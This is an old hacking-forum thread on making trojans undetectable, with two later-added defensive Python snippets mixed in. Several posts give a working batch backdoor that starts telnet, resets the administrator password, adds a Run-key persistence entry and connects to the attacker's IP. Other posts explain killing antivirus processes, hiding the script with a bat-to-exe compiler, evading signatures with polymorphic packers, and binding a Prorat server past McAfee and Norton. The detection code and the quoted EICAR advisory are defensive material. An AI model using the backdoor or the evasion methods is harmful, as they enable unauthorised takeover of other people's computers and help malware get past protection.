Undetectable Trojans
#46
Posted 24 March 2004 - 05:23 AM
Just for future reference, use C++ in the future. This way only works over school LANs (or computers without a firewall).
#47
Posted 09 April 2004 - 10:58 PM
#48 Guest_tstngry_*
Posted 12 April 2004 - 08:14 PM
net start telnet
net user administrator yourpwhere
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Rundllcms /t REG_SZ /d "net start telnet"
telnet youriphere
This .bat file will:
1. start telnet
2. change the administrator pw to whatever you want
3. add a registry key to start telnet every time that Windows starts
4. and if you have a program that will listen on a port for a connection you can even get their IP. (I use a prog called IPStealer for this)
After they are infected you can simply connect to them using telnet and log in as administrator using the pw you chose. From there you can kill any AV processes you see. And then you can upload your favorite DETECTED trojan. It's that easy. If this sounds complicated, it's not. There are many .bat file compilers around. I use one called BAT2EXE. It changes the .bat file to a .com file so the source code and your IP are hidden.
If this doesn't make sense to you or you have questions feel free to contact me. I really hope this helps.
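A defender's counterpart to the Run-key persistence described in the post above, added here as an example that is not from the thread: it parses reg query output for the Run key and flags entries that start a service or run a command interpreter instead of launching a program file. The sample output is constructed (only the Rundllcms entry comes from the post), and the heuristic rules are assumptions, not any vendor's signature.

```python
import re

# Constructed sample shaped like the output of:
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# Only the Rundllcms entry comes from the thread; the other entries are made up.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Rundllcms    REG_SZ    net start telnet
    VBoxTray    REG_SZ    C:\Windows\system32\VBoxTray.exe
"""

# One value line: leading whitespace, value name, REG_* type, then the data.
ENTRY_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")

# Launchers that mean "run a command", not "start this program file" (assumed list).
COMMAND_LAUNCHERS = {"net", "net.exe", "sc", "sc.exe", "cmd", "cmd.exe", "telnet", "telnet.exe"}
SERVICE_CONTROL = {"net", "net.exe", "sc", "sc.exe"}
# Telnet by display name or service name; a logon Run entry should never start it.
REMOTE_ACCESS_SERVICES = {"telnet", "tlntsvr"}


def parse_run_entries(text):
    """Return [(value_name, reg_type, data), ...] from reg query output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"].strip()))
    return entries


def suspicious_reasons(name, data):
    """Heuristic findings for one Run entry (assumed rules, not a vendor signature)."""
    reasons = []
    tokens = data.strip('"').split()
    # Launcher = first token, directory prefix removed, lower-cased.
    launcher = tokens[0].lower().rsplit("\\", 1)[-1] if tokens else ""
    if launcher in COMMAND_LAUNCHERS:
        reasons.append("runs a command rather than a program file")
    if (launcher in SERVICE_CONTROL and len(tokens) >= 3
            and tokens[1].lower() == "start"
            and tokens[2].lower() in REMOTE_ACCESS_SERVICES):
        reasons.append("starts a remote-access service at every logon")
    if name.lower().startswith("rundll") and "rundll32" not in data.lower():
        reasons.append("value name imitates rundll32 but the command never invokes it")
    return reasons


def audit_run_key(text):
    """Map each suspicious value name to its findings; clean entries are omitted."""
    found = ((n, suspicious_reasons(n, d)) for n, _t, d in parse_run_entries(text))
    return {n: r for n, r in found if r}
```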
#49
Posted 13 April 2004 - 05:23 AM
#50
Posted 13 April 2004 - 06:10 AM
Quote (tstngry):
I don't know if this will be helpful but I'll give it a try. WHY NOT USE .bat files! The way I infect someone is to use this simple .bat file and then compile it with a .bat compiler.
net start telnet
net user administrator yourpwhere
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v Rundllcms /t REG_SZ /d "net start telnet"
telnet youriphere
This .bat file will:
1. start telnet
2. change the administrator pw to whatever you want
3. add a registry key to start telnet every time that Windows starts
4. and if you have a program that will listen on a port for a connection you can even get their IP. (I use a prog called IPStealer for this)
After they are infected you can simply connect to them using telnet and log in as administrator using the pw you chose. From there you can kill any AV processes you see. And then you can upload your favorite DETECTED trojan. It's that easy. If this sounds complicated, it's not. There are many .bat file compilers around. I use one called BAT2EXE. It changes the .bat file to a .com file so the source code and your IP are hidden.
If this doesn't make sense to you or you have questions feel free to contact me. I really hope this helps.
but if it was an XP machine wouldn't it show up at the login screen?
just asking, I'm not 100% sure
#51 Guest_tstngry_*
Posted 13 April 2004 - 02:34 PM
Some of the commands you wanted:
1. view processes - tasklist
2. kill processes - taskkill /f /im "nameofprogram"
or - taskkill /f /pid "processid"
3. for uploading files I use rcp. If you don't know what that is I can explain, but I think there is a topic on the forum. That's where I learned it.
4. for starting programs, how about - start "programname.exe"
--don't use the "" of course
I still think this is the best way and I can answer any more questions if you have them.
#52
Posted 13 April 2004 - 05:39 PM
#53 Guest_tstngry_*
Posted 13 April 2004 - 06:40 PM
#54
Posted 13 April 2004 - 08:03 PM
Quote:
Dede is a Delphi DE-compiler (which means it reverts the program back to its source code if it's written in Delphi).
readme extract:
DeDe is a very fast program that can analyze executables compiled with Delphi 3, 4, 5 and give you the following:
sounds interesting, but the version I found (1.06) only decompiles Delphi 3 - 4 - 5
I guess the servers are built on Delphi 6 or 7
am I wrong?
#55
Posted 04 May 2004 - 11:11 AM
#56
Posted 05 May 2004 - 10:13 PM
#57
Posted 05 May 2004 - 11:29 PM
Quote:
Anyone know where to get a new PE patcher for UPX-packed files?
try upolyx, it's very good, but I reckon it might be picked up by AV now
#58
Posted 06 May 2004 - 12:17 AM
Quote:
Anyone know where to get a new PE patcher for UPX-packed files?
Quote:
try upolyx, it's very good, but I reckon it might be picked up by AV now
Well, it works well for Norton and a few others but KAV has picked up on it.
#59
Posted 06 May 2004 - 09:10 AM
Out of X number of posts there is only ONE post with even half a clue of what they are talking about. xwarlordx post, though brief, was at least facing the right way, the rest of you are 180 degrees out.
Here, again, is xwarlordx:
well the problem is, most trojans are user-level based, which always makes them (somehow) detectable; if you really want to come close to undetectable you should work kernel based (ntquery).
Then you should think about what you would like to hook exactly, like files, reg keys, dirs, ports even?
Also, most viruses still work with the reg run idea, which is really simple to clear; why not hook it into a process like gina --> winlogon or something? (too bad that that's user based like svchost)
Partly I blame a misunderstanding between what constitutes undetectABLE versus undetectED. Any fool can tell you how to make something undetectED and it seems that every fool just did (read previous pages). Making something undetectABLE would require a little creative thought and would have been an excellent and thought-provoking thread. Alas, this seems beyond our readership.
I applaud xwarlordx for bothering to provide a brief answer to the actual question.
Here is another:
I know of two methods that are undetectABLE* by current AV engines. The first relies on using tables of convoluted 'do-nothing' snippets that are used in multiple passes to dilute the decryption header to the point where signature-based recognition is almost impossible. This creates fresh undetectED code at each subsequent generation and is thus undetectABLE by CURRENT engines. Furthermore, it has been speculated that an engine to detect this method, although possible, would be prohibitive (both in false positives and in time taken) and thus unmarketable. This method will allow code to be executed although the code would have to take its own steps to avoid detection in memory. However, this task is aided by the fact that such detection can only occur once the integrity of the system is already compromised.
The second method uses its own block fetch-execute routine and runs slower, but has the benefit of not having enough decrypted bytes of code in memory at any one time to be susceptible to signature recognition in memory. The fetch-execute engine is based upon similar technology to the first method.
Virtually undetectable malware IS possible and would probably require a complete rethink of platform security to fix. It's a fascinating subject that should be of interest to us all. At least, all of us who are past hexing SubSeven.
My apologies to anyone I have missed (besides xwarlordx) who has more than half a brain...
SG
This post may be trashcanned as it is condescending and more than a little argumentative. I'm fine with that. But let's face the facts: if all you want is the same dull recycled kiddie garbage you can find anywhere else then posters like xwarlordx and myself are probably out of place. If I have offended you and you would like this post removed please
my post rather than sink to my level : )
*UndetectABLE. Nothing is TRULY undetectable. I instead (ab)use the term to describe anything which is prohibitively difficult or time-consuming to detect within reasonable parameters.
#60
Posted 08 May 2004 - 01:57 PM
Quote:
In the name of God, The Beneficent, The Merciful
Subject: Major Antivirus Software fails to detect new multi-dropping or binding techniques.
Discovered By: Mohammad R. Faghani.
Tested Software: Symantec Norton, McAfee VirusScan.
Risk Impact: High.
As we know, programming techniques are improving every day, and so is file binding.
There are lots of binders or multi-droppers nowadays.
What's a Multi-Dropper or Binder?
A multi-dropper or binder is a piece of software which binds some files together and gives you an executable file. When you run that file, the bound files will be executed one by one. Note that you can bind pictures with some other executables or any kind of files.
So the difference between a multi-dropper and an executable archive is that the binder will execute the bound files after you run it.
The story starts from here: if you use one of these kinds of binders to bind a virus with other malformed files, the antiviruses named above fail to detect it as a malicious executable file.
Proof of Concept
Using real viruses for testing in the real world is rather like setting fire to the dustbin in your office to see whether the smoke detector is working.
Such a test will give meaningful results, but with unappealing, unacceptable risks.
Since it is unacceptable for you that I prove my concept with a real virus, you need a file that can safely be passed around and which is obviously non-viral, but which your anti-virus software will react to as if it were a virus.
The good news is that such a test file already exists. A number of anti-virus researchers have already worked together to produce a file that their (and many other) products "detect" as if it were a virus. This test file has been provided to EICAR for distribution as the "EICAR Standard Anti-Virus Test File", and it satisfies our purpose. It is safe to pass around, because it is not a virus, and does not include any fragments of viral code.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
The 68-byte long string above is what we are looking for. Open Notepad (Start|Run, type notepad and press Enter).
Copy and paste the string above into the Notepad window and save it as eicar.exe (be sure to select "All Files" from the "Save as type:" combo).
Now if you have an antivirus with On Access Scan technology such as McAfee or Symantec Norton, the file save will be denied, because you are saving a virus on your computer! So you have to disable your antivirus first and do it again.
The file is a legitimate DOS program, and produces sensible results when run (it prints the message "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!").
Now if you bind this file with another program (or just alone with no other programs) with a new binder, the final executable file will not be detected as a virus.
I've made an example and it's safe to download. It contains 3 files:
EICAR.COM, the test virus; BINDEICAR.EXE, the bound EICAR.COM which has the EICAR.COM inside itself; and the README.
download it here: http://www.sharemati...s/testfiles.zip
Try scanning them with the built-in Norton Antivirus 2004 in Yahoo Mail or your desktop antivirus.
So it's so easy for an attacker to bind several trojans together and send the executable via email such as Yahoo Mail to the victim. You'll see that the antivirus cannot detect it as malware.
Then you can see how harmful it is if one of the mass-mailing worms uses this method to bypass email antivirus and infect the world.
I've noted those antivirus vendors while I'm writing this article.
P.S. Do not hesitate if you have any question.
Regards.
Mohammad Reza Faghani
Do you know this paper? I've made a Prorat 1.8 server and bound it with a file using the built-in binder, and it's undetected by McAfee and Norton, but not by KAV.
ps: sorry but I don't have the permission to make a new topic.
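To show why the wrapped EICAR file in the post above slips past a whole-file hash check or an offset-0 signature check while an offset-independent content search still catches it, here is an added example that is not part of the post or the zip it links to. The carrier layout (filler bytes, then the payload, then padding), the chunk sizes and the hash blacklist are constructed assumptions; the EICAR string is the public test string quoted in the post.

```python
import hashlib
import io

# EICAR standard anti-virus test string (68 bytes, benign by design).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
# What a hash-only scanner "knows": the digest of the stand-alone test file.
KNOWN_BAD_SHA256 = {hashlib.sha256(EICAR).hexdigest()}

def hash_scan(data: bytes) -> bool:
    """Whole-file hash lookup: matches only the exact stand-alone sample."""
    return hashlib.sha256(data).hexdigest() in KNOWN_BAD_SHA256

def prefix_scan(data: bytes) -> bool:
    """Signature checked at offset 0 only (where the EICAR spec places it)."""
    return data.startswith(EICAR)

def content_scan(data: bytes) -> bool:
    """Offset-independent search: still matches when a carrier puts a stub in
    front of the payload and padding after it, as the binder in the post does."""
    return EICAR in data

def stream_scan(fobj, chunk_size: int = 4096) -> int:
    """Chunked version of content_scan for large files. The last len(EICAR)-1
    bytes of each chunk are carried over so a signature that straddles a chunk
    boundary is not missed. Returns the absolute offset of the first hit or -1."""
    overlap = len(EICAR) - 1
    tail, pos = b"", 0  # pos: absolute file offset of tail[0]
    while True:
        chunk = fobj.read(chunk_size)
        if not chunk:
            return -1
        buf = tail + chunk
        idx = buf.find(EICAR)
        if idx != -1:
            return pos + idx
        keep = min(overlap, len(buf))
        pos += len(buf) - keep
        tail = buf[-keep:]

def scan_bytes_chunked(data: bytes, chunk_size: int = 4096) -> int:
    """Run stream_scan over in-memory bytes (handy for tests)."""
    return stream_scan(io.BytesIO(data), chunk_size)

def build_carrier(payload: bytes, stub_len: int = 4060) -> bytes:
    """Constructed test input, not a real binder: filler bytes standing in for a
    launcher stub, then the payload, then padding. The default stub length puts
    the payload across the 4096-byte chunk boundary on purpose."""
    return b"MZ" + b"\x00" * stub_len + payload + b"\n" * 16
```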